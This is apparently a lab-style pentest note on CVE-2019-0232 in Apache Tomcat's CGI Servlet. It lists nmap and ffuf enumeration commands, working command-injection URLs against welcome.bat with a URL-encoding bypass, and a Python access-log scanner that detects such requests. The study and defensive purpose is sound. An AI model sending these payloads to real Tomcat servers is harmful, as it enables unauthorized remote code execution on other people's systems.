17. Attacking Tomcat CGI

1. Vulnerability Overview

CVE-2019-0232 - Remote Code Execution (RCE)

  • Description: Allows remote code execution on Windows hosts due to improper input validation in the CGI Servlet when enableCmdLineArguments is set to true.

  • Affected Versions:

    • Tomcat 9.0.0.M1 to 9.0.17

    • Tomcat 8.5.0 to 8.5.39

    • Tomcat 7.0.0 to 7.0.93

  • Cause:

    • The CGI Servlet passes user-supplied input from the query string to the script as command-line arguments without proper sanitization, leading to command injection.


2. Enumeration

Nmap Scan

Identify open ports and running services, particularly Apache Tomcat.

nmap -p- -sC -Pn 10.129.204.227 --open

CGI Script Discovery (ffuf)

Discover CGI scripts using directory fuzzing.

ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat

This command fuzzes for CGI scripts with the .bat extension and may reveal welcome.bat.


3. Exploitation

Basic Command Injection

Execute the dir command to list files.

http://10.129.204.227:8080/cgi/welcome.bat?&dir

Retrieve Environment Variables

Check for useful system environment variables.

http://10.129.204.227:8080/cgi/welcome.bat?&set

This can reveal critical information, such as the PATH variable being unset.

Hardcoded Path Execution (whoami)

Attempt to execute whoami.exe by specifying its full path.

http://10.129.204.227:8080/cgi/welcome.bat?&c:\windows\system32\whoami.exe

This may fail if special characters are filtered.

URL Encoding Bypass

Bypass character filtering using URL encoding.

http://10.129.204.227:8080/cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe

This allows execution of whoami.exe despite input restrictions.


4. Key Considerations

  • The enableCmdLineArguments setting must be enabled for this exploit to work.

  • The & character is used to separate commands in the injection.

  • If the PATH environment variable is unset, commands must be executed with their full path.

  • URL encoding can help bypass character filtering.

  • Only test on systems you have explicit permission to assess.

  • Replace IP addresses, ports, and URLs with your specific target information.
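The considerations above also describe what a defender can look for in Tomcat's access log. The following Python scanner is an added example, not part of the original notes: it flags requests to CGI scripts whose query string contains no "=" (the case in which the CGI Servlet passes the query string to the script as command-line arguments when enableCmdLineArguments is true) and reports shell metacharacters, absolute Windows paths and percent-encoded bytes in those arguments. The log lines are constructed samples in the default AccessLogValve "common" pattern; the script path pattern /cgi/ or /cgi-bin/ is an assumption.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in Tomcat's default access log format (not taken from the notes).
SAMPLE_LOG = """\
10.10.14.5 - - [12/Mar/2024:10:01:02 +0000] "GET /cgi/welcome.bat HTTP/1.1" 200 145
10.10.14.5 - - [12/Mar/2024:10:01:09 +0000] "GET /cgi/welcome.bat?name=alice HTTP/1.1" 200 160
10.10.14.5 - - [12/Mar/2024:10:01:15 +0000] "GET /cgi/welcome.bat?&dir HTTP/1.1" 200 2048
10.10.14.5 - - [12/Mar/2024:10:01:21 +0000] "GET /cgi/welcome.bat?&set HTTP/1.1" 200 1890
10.10.14.5 - - [12/Mar/2024:10:01:33 +0000] "GET /cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe HTTP/1.1" 200 64
10.10.14.5 - - [12/Mar/2024:10:02:00 +0000] "GET /manager/html HTTP/1.1" 401 0
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+')
CGI_PATH_RE = re.compile(r'^/cgi(?:-bin)?/.*\.(?:bat|cmd|exe)$', re.IGNORECASE)  # assumed CGI mapping
SHELL_META = set('&|;<>^')  # cmd.exe command separators, redirections and escape char

def classify_target(target):
    """Return (suspicious, reason) for one request target taken from the access log."""
    parts = urlsplit(target)
    if not CGI_PATH_RE.match(unquote(parts.path)):
        return False, "not a CGI script request"
    query = parts.query
    if not query:
        return False, "no query string"
    # With enableCmdLineArguments=true the CGI Servlet only turns the query string into
    # command-line arguments when the raw query contains no '=' character.
    if '=' in query:
        return False, "name=value query; not passed as arguments"
    decoded = unquote(query)
    reasons = []
    if any(ch in SHELL_META for ch in decoded):
        reasons.append("shell metacharacter in arguments")
    if re.search(r'[a-z]:\\', decoded, re.IGNORECASE):
        reasons.append("absolute Windows path in arguments")
    if decoded != query:
        reasons.append("percent-encoded argument bytes")
    return True, "query passed as arguments" + (": " + ", ".join(reasons) if reasons else "")

def scan_access_log(text):
    """Return one (ip, target, status, reason) tuple per suspicious CGI request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        suspicious, reason = classify_target(m.group('target'))
        if suspicious:
            hits.append((m.group('ip'), m.group('target'), int(m.group('status')), reason))
    return hits
```

Running scan_access_log(SAMPLE_LOG) returns the three injection attempts and ignores the plain and name=value requests; a 200 status on a flagged line is the stronger signal, since it indicates the script actually ran.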


5. Commands Summary

# Nmap Scan - Identify open ports
nmap -p- -sC -Pn 10.129.204.227 --open

# ffuf - Discover CGI scripts
ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat

# Basic command injection (dir)
http://10.129.204.227:8080/cgi/welcome.bat?&dir

# Retrieve environment variables
http://10.129.204.227:8080/cgi/welcome.bat?&set

# Execute whoami using hardcoded path
http://10.129.204.227:8080/cgi/welcome.bat?&c:\windows\system32\whoami.exe

# URL encoded path execution
http://10.129.204.227:8080/cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe
